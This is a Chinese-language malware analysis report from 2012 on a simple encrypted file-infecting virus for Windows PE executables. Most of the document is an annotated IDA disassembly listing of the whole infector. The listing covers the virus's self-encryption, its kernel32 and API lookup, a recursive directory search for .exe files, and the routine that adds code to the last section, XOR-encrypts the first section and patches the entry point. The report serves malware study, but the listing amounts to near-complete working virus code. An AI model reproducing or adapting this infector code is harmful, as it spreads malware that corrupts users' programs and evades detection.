有加密的简单病毒

基本信息

报告名称:带加密简单病毒分析
作者：
报告更新日期： 2012.07.13
样本发现日期：
样本类型：
样本文件大小／被感染文件变化长度： B01h
样本文件MD5 校验值：
样本文件SHA1 校验值：
壳信息：
可能受到威胁的系统：
Microsoft Windows NT 4.0
Microsoft Windows NT 4.0 Terminal Services Edition
Microsoft Windows 2000
Microsoft Windows XP
Microsoft Windows Server 2003
Microsoft Windows vista
Microsoft Windows 7
相关漏洞：
已知检测名称：
简介
针对pe文件病毒

被感染系统及网络症状
程序无法正常启动

文件系统变化

注册表变化

网络症状

详细分析／功能介绍
1 病毒运行后，自身加密，防止查杀，分析。
2 获取相关api搜寻感染目标
3 解密病毒自身，加密被感染问价的第一个节，添加节注入病毒
.text:00401000 ;
.text:00401000 ; +-------------------------------------------------------------------------+
.text:00401000 ; |     This file is generated by The Interactive Disassembler (IDA)        |
.text:00401000 ; |     Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com>        |
.text:00401000 ; | Licensed to: Mach EDV Dienstleistungen, Jan Mach, 1 user, adv, 11/2007 |
.text:00401000 ; +-------------------------------------------------------------------------+
.text:00401000 ;
.text:00401000 ; Input MD5   : E75E98DFB5D445B1D79E52AB522E26A4
.text:00401000
.text:00401000 ; File Name   : C:\带简单加密的病毒\jiamivirus.exe
.text:00401000 ; Format      : Portable executable for 80386 (PE)
.text:00401000 ; Imagebase   : 400000
.text:00401000 ; Section 1. (virtual address 00001000)
.text:00401000 ; Virtual size                  : 00001E2A (   7722.)
.text:00401000 ; Section size in file          : 00002000 (   8192.)
.text:00401000 ; Offset to raw data for section: 00001000
.text:00401000 ; Flags 60000020: Text Executable Readable
.text:00401000 ; Alignment     : default
.text:00401000
.text:00401000                 .686p
.text:00401000                 .mmx
.text:00401000                 .model flat
.text:00401000
.text:00401000 ; ===========================================================================
.text:00401000
.text:00401000 ; Segment type: Pure code
.text:00401000 ; Segment permissions: Read/Execute
.text:00401000 _text           segment para public 'CODE' use32
.text:00401000                 assume cs:_text
.text:00401000                 ;org 401000h
.text:00401000                 assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
.text:00401000                 db 5 dup(0CCh)
.text:00401005 ; ---------------------------------------------------------------------------
.text:00401005                 jmp     inject
.text:0040100A ; ---------------------------------------------------------------------------
.text:0040100A                 jmp     sub_40124E
.text:0040100F ; ---------------------------------------------------------------------------
.text:0040100F                 jmp     sub_40130A
.text:0040100F ; ---------------------------------------------------------------------------
.text:00401014                 db 1Ch dup(0CCh)
.text:00401030
.text:00401030 ; =============== S U B R O U T I N E =======================================
.text:00401030
.text:00401030
.text:00401030                 public start
.text:00401030 start           proc near               ; DATA XREF: inject+1B9r
.text:00401030
.text:00401030 ; FUNCTION CHUNK AT .text:00401233 SIZE 0000001B BYTES
.text:00401030
.text:00401030                 call    $+5
.text:00401035
.text:00401035 loc_401035:                             ; DATA XREF: start+6o
.text:00401035                 pop     ebp
.text:00401036                 sub     ebp, offset loc_401035
.text:0040103C                 lea     esi, dword_401062[ebp]
.text:00401042                 lea     edi, dword_401062[ebp]
.text:00401048                 mov     ecx, 0B01h//循环次数
.text:0040104D                 mov     bl, ss:byte_40165F[ebp]
加密病毒本身
.text:00401053
.text:00401053 loc_401053:                             ; CODE XREF: start+2Ej
.text:00401053                 or      ecx, ecx        ; for(i=ecx,i>0;i++)
.text:00401053                                         ; {
.text:00401053                                         ;   al=40165f[i];
.text:00401053                                         ;   al=xor al,bl;
.text:00401053                                         ;   40186f[i]=al;
.text:00401053                                         ; }
.text:00401055                 jnz     short loc_401059
.text:00401057                 jmp     short loc_401060 ;
.text:00401059 ; ---------------------------------------------------------------------------
.text:00401059
.text:00401059 loc_401059:                             ; CODE XREF: start+25j
.text:00401059                 lodsb
.text:0040105A                 xor     al, bl
.text:0040105C                 stosb
.text:0040105D                 dec     ecx
.text:0040105E                 jmp     short loc_401053 ; for(i=ecx,i>0;i++)
.text:0040105E                                         ; {
.text:0040105E                                         ;   al=40165f[i];
.text:0040105E                                         ;   al=xor al,bl;
.text:0040105E                                         ;   40186f[i]=al;
.text:0040105E                                         ; }
.text:00401060 ; ---------------------------------------------------------------------------
.text:00401060
.text:00401060 loc_401060:                             ; CODE XREF: start+27j
.text:00401060                 jmp     short loc_401068 ;
.text:00401060 ; ---------------------------------------------------------------------------
.text:00401062 dword_401062    dd 72616863h            ; DATA XREF: start+Cr
.text:00401062                                         ; start+12r ...
.text:00401066                 dw 656Dh
.text:00401068 ; ---------------------------------------------------------------------------
.text:00401068
.text:00401068 loc_401068:                             ; CODE XREF: start:loc_401060j
.text:00401068                 mov     esi, ss:image_base[ebp]
.text:0040106E                 mov     edi, esi
.text:00401070                 mov     ecx, ss:virtualsize[ebp]
.text:00401076
.text:00401076 loc_401076:                             ; CODE XREF: start+51j
.text:00401076                 or      ecx, ecx
.text:00401078                 jnz     short loc_40107C
.text:0040107A                 jmp     short loc_401083
.text:0040107C ; ---------------------------------------------------------------------------
.text:0040107C
.text:0040107C loc_40107C:                             ; CODE XREF: start+48j
.text:0040107C                 lodsb
.text:0040107D                 xor     al, bl
.text:0040107F                 stosb
.text:00401080                 dec     ecx
.text:00401081                 jmp     short loc_401076
搜索 kernel，搜索api
.text:00401083 ; ---------------------------------------------------------------------------
.text:00401083
.text:00401083 loc_401083:                             ; CODE XREF: start+4Aj
.text:00401083                 mov     ss:byte_40165F[ebp], bl
.text:00401089                 mov     eax, [esp+0]
.text:0040108C                 and     eax, 0FFFFF000h
.text:00401091
.text:00401091 loc_401091:                             ; CODE XREF: start+6Dj
.text:00401091                 cmp     word ptr [eax], 'ZM'
.text:00401096                 jz      short loc_40109F ; 查找成功跳转
.text:00401098                 sub     eax, 1000h      ; 第一种方式查找kernel
.text:0040109D                 jmp     short loc_401091
.text:0040109F ; ---------------------------------------------------------------------------
.text:0040109F
.text:0040109F loc_40109F:                             ; CODE XREF: start+66j
.text:0040109F                 mov     ss:peheader[ebp], eax
.text:004010A5                 lea     esi, byte_40166D[ebp]
.text:004010AB                 call    get_api_process ; 在导出表中搜索需要的api
.text:004010B0                 mov     ss:dword_401679[ebp], eax
.text:004010B6                 mov     eax, ss:peheader[ebp]
.text:004010BC                 lea     esi, byte_40171F[ebp]
.text:004010C2                 call    get_api_process ; 在导出表中搜索需要的api
.text:004010C7                 mov     dword ptr ss:find_firstfile[ebp], eax
.text:004010CD                 mov     eax, ss:peheader[ebp]
.text:004010D3                 lea     esi, byte_4016B4[ebp]
.text:004010D9                 call    get_api_process ; 在导出表中搜索需要的api
.text:004010DE                 mov     ss:setcurrentdirectory[ebp], eax
.text:004010E4                 mov     eax, ss:peheader[ebp]
.text:004010EA                 lea     esi, dword_401731[ebp]
.text:004010F0                 call    get_api_process ; 在导出表中搜索需要的api
.text:004010F5                 mov     ss:getfileatributes[ebp], eax
.text:004010FB                 mov     eax, ss:peheader[ebp]
.text:00401101                 lea     esi, dword_401747[ebp]
.text:00401107                 call    get_api_process ; 在导出表中搜索需要的api
.text:0040110C                 mov     ss:find_nexttfile[ebp], eax
.text:00401112                 mov     eax, ss:peheader[ebp]
.text:00401118                 lea     esi, dword_401758[ebp]
.text:0040111E                 call    get_api_process ; 在导出表中搜索需要的api
.text:00401123                 mov     ss:dword_401762[ebp], eax
.text:00401129                 mov     eax, ss:peheader[ebp]
.text:0040112F                 lea     esi, dword_40167D[ebp]
.text:00401135                 call    get_api_process ; 在导出表中搜索需要的api
.text:0040113A                 mov     ss:dword_401688[ebp], eax
.text:00401140                 mov     eax, ss:peheader[ebp]
.text:00401146                 lea     esi, dword_401766[ebp]
.text:0040114C                 call    get_api_process ; 在导出表中搜索需要的api
.text:00401151                 mov     ss:dword_40176E[ebp], eax
.text:00401157                 mov     eax, ss:peheader[ebp]
.text:0040115D                 lea     esi, dword_40170F[ebp]
.text:00401163                 call    get_api_process ; 在导出表中搜索需要的api
.text:00401168                 mov     ss:getfilesize[ebp], eax
.text:0040116E                 mov     eax, ss:peheader[ebp]
.text:00401174                 lea     esi, aCreatefilemapp[ebp] ; "CreateFileMapping"
.text:0040117A                 call    get_api_process ; 在导出表中搜索需要的api
.text:0040117F                 mov     ss:creatfile_map[ebp], eax
.text:00401185                 mov     eax, ss:peheader[ebp]
.text:0040118B                 lea     esi, dword_4016A2[ebp]
.text:00401191                 call    get_api_process ; 在导出表中搜索需要的api
.text:00401196                 mov     ss:viewoffile[ebp], eax
.text:0040119C                 mov     eax, ss:peheader[ebp]
.text:004011A2                 lea     esi, dword_4016CC[ebp]
.text:004011A8                 call    get_api_process ; 在导出表中搜索需要的api
.text:004011AD                 mov     ss:dword_4016D8[ebp], eax
.text:004011B3                 mov     eax, ss:peheader[ebp]
.text:004011B9                 lea     esi, dword_4016EB[ebp]
.text:004011BF                 call    get_api_process ; 在导出表中搜索需要的api
.text:004011C4                 mov     ss:dword_4016FB[ebp], eax
.text:004011CA                 mov     eax, ss:peheader[ebp]
.text:004011D0                 lea     esi, dword_4016FF[ebp]
.text:004011D6                 call    get_api_process ; 在导出表中搜索需要的api
.text:004011DB                 mov     ss:dword_40170B[ebp], eax
.text:004011E1                 jmp     short loc_401233
.text:004011E1 start           endp
.text:004011E1
.text:004011E3
.text:004011E3 ; =============== S U B R O U T I N E =======================================
.text:004011E3
在导出表中搜索需要的api
.text:004011E3 ;
.text:004011E3
.text:004011E3 get_api_process proc near               ; CODE XREF: start+7Bp
.text:004011E3                                         ; start+92p ...
.text:004011E3                 mov     ebx, [eax+3Ch]
.text:004011E6                 add     ebx, eax
.text:004011E8                 add     ebx, 78h        ; ebx fileheader
.text:004011EB                 mov     ebx, [ebx]      ; ebx datadirectory
.text:004011ED                 add     ebx, eax
.text:004011EF                 xor     edx, edx
.text:004011F1                 mov     ecx, [ebx+20h]
.text:004011F4                 add     ecx, eax        ; ecx addressofname
.text:004011F6                 push    esi
.text:004011F7                 push    edx
.text:004011F8
.text:004011F8 loc_4011F8:                             ; CODE XREF: get_api_process+27j
.text:004011F8                 pop     edx
.text:004011F9                 pop     esi
.text:004011FA                 inc     edx
.text:004011FB                 mov     edi, [ecx]      ; 输出地址表起始地址
.text:004011FD                 add     edi, eax
.text:004011FF                 add     ecx, 4          ; 输出名称表
.text:00401202                 push    esi
.text:00401203                 push    edx
.text:00401204
.text:00401204 loc_401204:                             ; CODE XREF: get_api_process+30j
.text:00401204                 mov     dl, [edi]
.text:00401206                 mov     dh, [esi]
.text:00401208                 cmp     dl, dh
.text:0040120A                 jnz     short loc_4011F8
.text:0040120C                 inc     edi
.text:0040120D                 inc     esi
.text:0040120E                 cmp     byte ptr [esi], 0
.text:00401211                 jz      short loc_401215
.text:00401213                 jmp     short loc_401204
.text:00401215 ; ---------------------------------------------------------------------------
.text:00401215
.text:00401215 loc_401215:                             ; CODE XREF: get_api_process+2Ej
.text:00401215                 pop     edx
.text:00401216                 pop     esi
.text:00401217                 dec     edx
.text:00401218                 shl     edx, 1
.text:0040121A                 mov     ecx, [ebx+24h]
.text:0040121D                 add     ecx, eax
.text:0040121F                 add     ecx, edx
.text:00401221                 xor     edx, edx
.text:00401223                 mov     dx, [ecx]
.text:00401226                 shl     edx, 2
.text:00401229                 mov     ecx, [ebx+1Ch]
.text:0040122C                 add     ecx, eax
.text:0040122E                 add     ecx, edx
.text:00401230                 add     eax, [ecx]
.text:00401232                 retn
.text:00401232 get_api_process endp
.text:00401232
.text:00401233 ; ---------------------------------------------------------------------------
.text:00401233 ; START OF FUNCTION CHUNK FOR start
转换当前位置寻找感染目标
.text:00401233
.text:00401233 loc_401233:                             ; CODE XREF: start+1B1j
.text:00401233                 lea     esi, directroy_path[ebp]
.text:00401239                 push    esi
.text:0040123A                 mov     eax, ss:setcurrentdirectory[ebp]
.text:00401240                 call    eax
.text:00401242                 push    ebp
.text:00401243                 call    sub_40130A      ; 搜索文件函数
.text:00401248                 pop     ebp
.text:00401249                 jmp     nullsub_1
.text:00401249 ; END OF FUNCTION CHUNK FOR start
.text:0040124E
.text:0040124E ; =============== S U B R O U T I N E =======================================
.text:0040124E
.text:0040124E
.text:0040124E sub_40124E      proc near               ; CODE XREF: .text:0040100Aj
.text:0040124E                                         ; sub_40130A+66p ...
.text:0040124E                 lea     eax, dword_401A12[ebp]
.text:00401254                 push    eax
.text:00401255                 lea     eax, byte_401893[ebp]
.text:0040125B                 push    eax
.text:0040125C                 mov     eax, dword ptr ss:find_firstfile[ebp]
.text:00401262                 call    eax
.text:00401264                 mov     ss:dword_4018A4[ebp], eax
.text:0040126A                 cmp     eax, 0FFFFFFFFh
.text:0040126D                 jnz     short loc_401279
.text:0040126F                 mov     eax, 0FFFFFFFFh
.text:00401274                 jmp     locret_401309
.text:00401279 ; ---------------------------------------------------------------------------
.text:00401279
.text:00401279 loc_401279:                             ; CODE XREF: sub_40124E+1Fj
.text:00401279                 lea     esi, dword_401A12[ebp]
.text:0040127F                 lea     eax, [esi+2Ch]
.text:00401282                 mov     esi, eax
.text:00401284                 lodsb
.text:00401285                 cmp     al, '.'
.text:00401287                 jnz     short loc_40128B
.text:00401289                 jmp     short loc_4012B2
.text:0040128B ; ---------------------------------------------------------------------------
.text:0040128B
.text:0040128B loc_40128B:                             ; CODE XREF: sub_40124E+39j
.text:0040128B                 lea     esi, dword_401A12[ebp]
.text:00401291                 lea     eax, [esi+2Ch]
.text:00401294                 push    eax
.text:00401295                 push    eax
.text:00401296                 mov     eax, ss:getfileatributes[ebp]
.text:0040129C                 call    eax
.text:0040129E                 cmp     eax, 10h
.text:004012A1                 jz      short loc_4012B1
.text:004012A3                 pop     eax
.text:004012A4                 mov     ss:filename[ebp], eax
.text:004012AA                 call    inject
.text:004012AF                 jmp     short loc_4012B2
.text:004012B1 ; ---------------------------------------------------------------------------
.text:004012B1
.text:004012B1 loc_4012B1:                             ; CODE XREF: sub_40124E+53j
.text:004012B1                 pop     eax
.text:004012B2
.text:004012B2 loc_4012B2:                             ; CODE XREF: sub_40124E+3Bj
.text:004012B2                                         ; sub_40124E+61j ...
.text:004012B2                 lea     esi, dword_401A12[ebp]
.text:004012B8                 push    esi
.text:004012B9                 mov     esi, ss:dword_4018A4[ebp]
.text:004012BF                 push    esi
.text:004012C0                 mov     eax, ss:find_nexttfile[ebp]
.text:004012C6                 call    eax
.text:004012C8                 or      eax, eax
.text:004012CA                 jnz     short loc_4012CE
.text:004012CC                 jmp     short locret_401309
.text:004012CE ; ---------------------------------------------------------------------------
.text:004012CE
.text:004012CE loc_4012CE:                             ; CODE XREF: sub_40124E+7Cj
.text:004012CE                 lea     esi, dword_401A12[ebp]
.text:004012D4                 lea     eax, [esi+2Ch]
.text:004012D7                 mov     esi, eax
.text:004012D9                 lodsb
.text:004012DA                 cmp     al, 2Eh
.text:004012DC                 jnz     short loc_4012E0
.text:004012DE                 jmp     short loc_4012B2
.text:004012E0 ; ---------------------------------------------------------------------------
.text:004012E0
.text:004012E0 loc_4012E0:                             ; CODE XREF: sub_40124E+8Ej
.text:004012E0                 lea     esi, dword_401A12[ebp]
.text:004012E6                 lea     eax, [esi+2Ch]
.text:004012E9                 push    eax
.text:004012EA                 push    eax
.text:004012EB                 mov     eax, ss:getfileatributes[ebp]
.text:004012F1                 call    eax
.text:004012F3                 cmp     eax, 10h
.text:004012F6                 jz      short loc_401306
.text:004012F8                 pop     eax
.text:004012F9                 mov     ss:filename[ebp], eax
.text:004012FF                 call    inject//////////////符合要求进行感染
.text:00401304                 jmp     short loc_401307
.text:00401306 ; ---------------------------------------------------------------------------
.text:00401306
.text:00401306 loc_401306:                             ; CODE XREF: sub_40124E+A8j
.text:00401306                 pop     eax
.text:00401307
.text:00401307 loc_401307:                             ; CODE XREF: sub_40124E+B6j
.text:00401307                 jmp     short loc_4012B2
.text:00401309 ; ---------------------------------------------------------------------------
.text:00401309
.text:00401309 locret_401309:                          ; CODE XREF: sub_40124E+26j
.text:00401309                                         ; sub_40124E+7Ej
.text:00401309                 retn
.text:00401309 sub_40124E      endp
.text:00401309
.text:0040130A
.text:0040130A ; =============== S U B R O U T I N E =======================================
.text:0040130A
.text:0040130A
.text:0040130A sub_40130A      proc near               ; CODE XREF: .text:0040100Fj
.text:0040130A                                         ; start+213p
.text:0040130A                 lea     esi, file_data_stru[ebp]
.text:00401310                 push    esi
.text:00401311                 lea     esi, word_40188F[ebp] ; ;exe文件
.text:00401317                 push    esi
.text:00401318                 mov     eax, dword ptr ss:find_firstfile[ebp]
.text:0040131E                 call    eax
.text:00401320                 mov     ss:file_handle[ebp], eax
.text:00401326                 cmp     eax, 0FFFFFFFFh
.text:00401329                 jnz     short loc_401335
.text:0040132B                 mov     eax, 0FFFFFFFFh
.text:00401330                 jmp     locret_4013F1
.text:00401335 ; ---------------------------------------------------------------------------
.text:00401335
.text:00401335 loc_401335:                             ; CODE XREF: sub_40130A+1Fj
.text:00401335                 lea     esi, file_data_stru[ebp]
.text:0040133B                 lea     eax, [esi+2Ch]
.text:0040133E                 mov     esi, eax
.text:00401340                 lodsb
.text:00401341                 cmp     al, '.'
.text:00401343                 jnz     short loc_401347
.text:00401345                 jmp     short loc_401384
.text:00401347 ; ---------------------------------------------------------------------------
.text:00401347
.text:00401347 loc_401347:                             ; CODE XREF: sub_40130A+39j
.text:00401347                 lea     esi, file_data_stru[ebp]
.text:0040134D                 lea     eax, [esi+2Ch]
.text:00401350                 push    eax
.text:00401351                 mov     eax, ss:getfileatributes[ebp] ; 为指定文件或目录返回系统属性
.text:00401357                 call    eax
.text:00401359                 cmp     eax, 10h        ; 判断是否为目录
.text:0040135C                 jnz     short loc_401384
.text:0040135E                 lea     esi, file_data_stru[ebp] ; 是目录
.text:00401364                 lea     eax, [esi+2Ch]
.text:00401367                 push    eax
.text:00401368                 mov     eax, ss:setcurrentdirectory[ebp]
.text:0040136E                 call    eax
.text:00401370                 call    sub_40124E      ; 进入目录继续搜索文件
.text:00401375                 lea     eax, dword_401899[ebp]
.text:0040137B                 push    eax
.text:0040137C                 mov     eax, ss:setcurrentdirectory[ebp]
.text:00401382                 call    eax             ; 返回上一级
.text:00401384
.text:00401384 loc_401384:                             ; CODE XREF: sub_40130A+3Bj
.text:00401384                                         ; sub_40130A+52j ...
.text:00401384                 lea     esi, file_data_stru[ebp]
.text:0040138A                 push    esi
.text:0040138B                 mov     eax, ss:file_handle[ebp]
.text:00401391                 push    eax
.text:00401392                 mov     eax, ss:find_nexttfile[ebp]
.text:00401398                 call    eax
.text:0040139A                 or      eax, eax
.text:0040139C                 jnz     short loc_4013A0
.text:0040139E                 jmp     short locret_4013F1
.text:004013A0 ; ---------------------------------------------------------------------------
.text:004013A0
.text:004013A0 loc_4013A0:                             ; CODE XREF: sub_40130A+92j
.text:004013A0                 lea     esi, file_data_stru[ebp]
.text:004013A6                 lea     eax, [esi+2Ch]
.text:004013A9                 mov     esi, eax
.text:004013AB                 lodsb
.text:004013AC                 cmp     al, '.'
.text:004013AE                 jnz     short loc_4013B2
.text:004013B0                 jmp     short loc_401384
.text:004013B2 ; ---------------------------------------------------------------------------
.text:004013B2
.text:004013B2 loc_4013B2:                             ; CODE XREF: sub_40130A+A4j
.text:004013B2                 lea     esi, file_data_stru[ebp]
.text:004013B8                 lea     eax, [esi+2Ch]
.text:004013BB                 push    eax
.text:004013BC                 mov     eax, ss:getfileatributes[ebp]
.text:004013C2                 call    eax
.text:004013C4                 cmp     eax, 10h
.text:004013C7                 jnz     short loc_4013EF
.text:004013C9                 lea     esi, file_data_stru[ebp]
.text:004013CF                 lea     eax, [esi+2Ch]
.text:004013D2                 push    eax
.text:004013D3                 mov     eax, ss:setcurrentdirectory[ebp]
.text:004013D9                 call    eax
.text:004013DB                 call    sub_40124E
.text:004013E0                 lea     eax, dword_401899[ebp]
.text:004013E6                 push    eax
.text:004013E7                 mov     eax, ss:setcurrentdirectory[ebp]
.text:004013ED                 call    eax
.text:004013EF
.text:004013EF loc_4013EF:                             ; CODE XREF: sub_40130A+BDj
.text:004013EF                 jmp     short loc_401384
.text:004013F1 ; ---------------------------------------------------------------------------
.text:004013F1
.text:004013F1 locret_4013F1:                          ; CODE XREF: sub_40130A+26j
.text:004013F1                                         ; sub_40130A+94j
.text:004013F1                 retn
.text:004013F1 sub_40130A      endp
.text:004013F1
.text:004013F2
.text:004013F2 ; =============== S U B R O U T I N E =======================================
.text:004013F2
感染主体
.text:004013F2
.text:004013F2 inject          proc near               ; CODE XREF: .text:00401005j
.text:004013F2                                         ; sub_40124E+5Cp ...
.text:004013F2                 push    0
.text:004013F4                 push    80h
.text:004013F9                 push    4
.text:004013FB                 push    0
.text:004013FD                 push    3
.text:004013FF                 push    0C0000000h
.text:00401404                 mov     eax, ss:filename[ebp]
.text:0040140A                 push    eax
.text:0040140B                 mov     eax, ss:dword_401688[ebp]
.text:00401411                 call    eax
.text:00401413                 mov     ss:(dword_401899+3)[ebp], eax
.text:00401419                 push    0
.text:0040141B                 push    eax
.text:0040141C                 mov     eax, ss:getfilesize[ebp]
.text:00401422                 call    eax
.text:00401424                 add     eax, 0B33h
.text:00401429                 add     eax, 1000h
.text:0040142E                 mov     ss:dword_401B5F[ebp], eax
.text:00401434                 push    0
.text:00401436                 mov     eax, ss:dword_401B5F[ebp]
.text:0040143C                 push    eax
.text:0040143D                 push    0
.text:0040143F                 push    4
.text:00401441                 push    0
.text:00401443                 mov     eax, ss:(dword_401899+3)[ebp]
.text:00401449                 push    eax
.text:0040144A                 mov     eax, ss:creatfile_map[ebp]
.text:00401450                 call    eax
.text:00401452                 mov     ss:dword_4018A8[ebp], eax ; 返回文件映射对象的句柄
.text:00401458                 push    ss:dword_401B5F[ebp]
.text:0040145E                 push    0
.text:00401460                 push    0
.text:00401462                 push    2
.text:00401464                 mov     eax, ss:dword_4018A8[ebp]
.text:0040146A                 push    eax
.text:0040146B                 mov     eax, ss:viewoffile[ebp]
.text:00401471                 call    eax
.text:00401473                 mov     ss:map_base[ebp], eax
.text:00401479                 mov     edi, eax
.text:0040147B                 xor     eax, eax
.text:0040147D                 mov     ax, [edi]
.text:00401480                 add     edi, [edi+3Ch]
.text:00401483                 add     edi, 4
.text:00401486                 xor     ecx, ecx
.text:00401488                 mov     cx, [edi+2]
.text:0040148C                 mov     ss:num_of_section[ebp], ecx
.text:00401492                 add     edi, 14h
.text:00401495                 mov     ss:option_header[ebp], edi
.text:0040149B                 mov     eax, [edi+1Ch]
.text:0040149E                 mov     ss:image_base[ebp], eax
.text:004014A4                 add     eax, [edi+10h]
.text:004014A7                 mov     ss:entry_add[ebp], eax
.text:004014AD                 mov     eax, [edi+24h]
.text:004014B0                 mov     ss:filealign[ebp], eax
.text:004014B6                 add     edi, 0E0h
.text:004014BC                 xor     esi, esi
.text:004014BE
.text:004014BE loc_4014BE:                             ; CODE XREF: inject+112j
.text:004014BE                 or      ecx, ecx
.text:004014C0                 jnz     short loc_4014C4 ; 来到第一个节
.text:004014C2                 jmp     short loc_401506 ; 来到最后一个节
.text:004014C4 ; ---------------------------------------------------------------------------
.text:004014C4
.text:004014C4 loc_4014C4:                             ; CODE XREF: inject+CEj
.text:004014C4                 or      esi, esi        ; 来到第一个节
.text:004014C6                 jnz     short loc_4014F6
.text:004014C8                 mov     eax, [edi+14h]
.text:004014CB                 mov     ss:point_to_rawdata[ebp], eax
.text:004014D1                 mov     eax, [edi+0Ch]
.text:004014D4                 add     ss:image_base[ebp], eax
.text:004014DA                 mov     eax, [edi+8]
.text:004014DD                 mov     ss:virtualsize[ebp], eax
.text:004014E3                 mov     al, [edi]
.text:004014E5                 mov     ss:sectionname[ebp], al
.text:004014EB                 mov     eax, [edi+24h]
.text:004014EE                 or      eax, 0A0000020h
.text:004014F3                 mov     [edi+24h], eax ; 节属性异或对第一个节进行加密
.text:004014F6
.text:004014F6 loc_4014F6:                             ; CODE XREF: inject+D4j
.text:004014F6                 cmp     [edi+14h], esi
.text:004014F9                 jbe     short loc_401500
.text:004014FB                 mov     esi, [edi+14h]
.text:004014FE                 mov     eax, edi
.text:00401500
.text:00401500 loc_401500:                             ; CODE XREF: inject+107j
.text:00401500                 add     edi, 28h
.text:00401503                 dec     ecx
.text:00401504                 jmp     short loc_4014BE
.text:00401506 ; ---------------------------------------------------------------------------
.text:00401506
.text:00401506 loc_401506:                             ; CODE XREF: inject+D0j
.text:00401506                 mov     edi, eax        ; 来到最后一个节
增加节注入病毒
.text:00401508                 mov     ebx, [edi+8]
.text:0040150B                 add     ebx, 0B33h
.text:00401511                 add     ebx, 7
.text:00401514                 mov     [edi+8], ebx    ; 扩大virtualsize
.text:00401517                 push    edi
.text:00401518                 lea     eax, [edi]
.text:0040151A                 mov     edi, eax
.text:0040151C                 mov     al, 2Eh
.text:0040151E                 stosb
.text:0040151F                 mov     al, 74h
.text:00401521                 stosb
.text:00401522                 mov     al, 65h
.text:00401524                 stosb
.text:00401525                 mov     al, 78h
.text:00401527                 stosb
.text:00401528                 mov     al, 74h
.text:0040152A                 stosb
.text:0040152B                 mov     al, 0
.text:0040152D                 stosb
.text:0040152E                 pop     edi             ; 重新写节的名称
.text:0040152F                 xor     edx, edx
.text:00401531                 mov     eax, ebx
.text:00401533                 mov     ebx, ss:filealign[ebp]
.text:00401539                 div     ebx
.text:0040153B                 or      edx, edx
.text:0040153D                 jnz     short loc_401544 ; 对齐函数
.text:0040153F                 mov     eax, [edi+8]
.text:00401542                 jmp     short loc_401565
.text:00401544 ; ---------------------------------------------------------------------------
.text:00401544
.text:00401544 loc_401544:                             ; CODE XREF: inject+14Bj
.text:00401544                 mov     eax, [edi+8]    ; 对齐函数
.text:00401547                 mov     ebx, ss:filealign[ebp]
.text:0040154D                 push    ebx
.text:0040154E                 xor     ecx, ecx
.text:00401550                 mov     edx, eax
.text:00401552
.text:00401552 loc_401552:                             ; CODE XREF: inject:loc_40155Cj
.text:00401552                 inc     ecx
.text:00401553                 shr     ebx, 1
.text:00401555                 or      ebx, ebx
.text:00401557                 jnz     short loc_40155C
.text:00401559                 dec     ecx
.text:0040155A                 jmp     short loc_40155E
.text:0040155C ; ---------------------------------------------------------------------------
.text:0040155C
.text:0040155C loc_40155C:                             ; CODE XREF: inject+165j
.text:0040155C                 jmp     short loc_401552
.text:0040155E ; ---------------------------------------------------------------------------
.text:0040155E
.text:0040155E loc_40155E:                             ; CODE XREF: inject+168j
.text:0040155E                 sar     eax, cl
.text:00401560                 shl     eax, cl
.text:00401562                 pop     ebx
.text:00401563                 add     eax, ebx
.text:00401565
.text:00401565 loc_401565:                             ; CODE XREF: inject+150j
.text:00401565                 mov     ebx, [edi+10h]
.text:00401568                 mov     [edi+10h], eax ; 修改文件对齐大小
.text:0040156B                 sub     eax, ebx
.text:0040156D                 shr     eax, 0Ch
.text:00401570                 shl     eax, 0Ch
.text:00401573                 mov     ss:dword_4018CC[ebp], eax ; ???????????????
.text:00401573                                         ; 如果差值大于2……12次方就不变否则清0了
.text:00401579                 mov     eax, [edi+24h]
.text:0040157C                 or      eax, 0A0000020h ; 还原之前的属性
.text:00401581                 mov     [edi+24h], eax
.text:00401584                 mov     esi, [edi+0Ch]
.text:00401587                 add     esi, [edi+8]
.text:0040158A                 sub     esi, 0B33h
.text:00401590                 sub     esi, 7
.text:00401593                 push    esi             ; 原来的virtualsize
.text:00401594                 mov     esi, [edi+14h]
.text:00401597                 add     esi, [edi+8]
.text:0040159A                 sub     esi, 0B33h
.text:004015A0                 sub     esi, 7
.text:004015A3                 mov     edi, esi        ; 还原原来的pointtorawdata
.text:004015A5                 add     edi, ss:map_base[ebp]
.text:004015AB                 lea     esi, start[ebp]
.text:004015B1                 mov     ecx, 32h        ; 写入节内容
.text:004015B6                 rep movsb
.text:004015B8                 lea     esi, dword_401062[ebp]
.text:004015BE                 mov     ecx, 0B01h
.text:004015C3                 mov     bl, ss:byte_40165F[ebp]
.text:004015C9                 inc     bl
.text:004015CB                 xor     al, al
.text:004015CD                 mov     ss:byte_40165F[ebp], al
.text:004015D3
.text:004015D3 loc_4015D3:                             ; CODE XREF: inject+1ECj
.text:004015D3                 or      ecx, ecx
.text:004015D5                 jnz     short loc_4015D9
.text:004015D7                 jmp     short loc_4015E0
.text:004015D9 ; ---------------------------------------------------------------------------
.text:004015D9
解密
.text:004015D9 loc_4015D9:                             ; CODE XREF: inject+1E3j
.text:004015D9                 lodsb
.text:004015DA                 xor     al, bl          ; 异或解密
.text:004015DC                 stosb
.text:004015DD                 dec     ecx
.text:004015DE                 jmp     short loc_4015D3
.text:004015E0 ; ---------------------------------------------------------------------------
.text:004015E0
.text:004015E0 loc_4015E0:                             ; CODE XREF: inject+1E5j
.text:004015E0                 push    edi
.text:004015E1                 mov     esi, ss:point_to_rawdata[ebp]
.text:004015E7                 add     esi, ss:map_base[ebp]
.text:004015ED                 mov     edi, esi
.text:004015EF                 mov     ecx, ss:virtualsize[ebp]
.text:004015F5
.text:004015F5 loc_4015F5:                             ; CODE XREF: inject+20Ej
.text:004015F5                 or      ecx, ecx        ; 循环
.text:004015F7                 jnz     short loc_4015FB
.text:004015F9                 jmp     short loc_401602
.text:004015FB ; ---------------------------------------------------------------------------
.text:004015FB
.text:004015FB loc_4015FB:                             ; CODE XREF: inject+205j
.text:004015FB                 lodsb
.text:004015FC                 xor     al, bl
.text:004015FE                 stosb
.text:004015FF                 dec     ecx
.text:00401600                 jmp     short loc_4015F5 ; 加密第一个节
.text:00401602 ; ---------------------------------------------------------------------------
.text:00401602
.text:00401602 loc_401602:                             ; CODE XREF: inject+207j
.text:00401602                 pop     edi
.text:00401603                 mov     al, 0B8h
.text:00401605                 stosb
.text:00401606                 mov     eax, ss:entry_add[ebp]
.text:0040160C                 stosd
.text:0040160D                 mov     ax, 0D0FFh
.text:00401611                 stosw
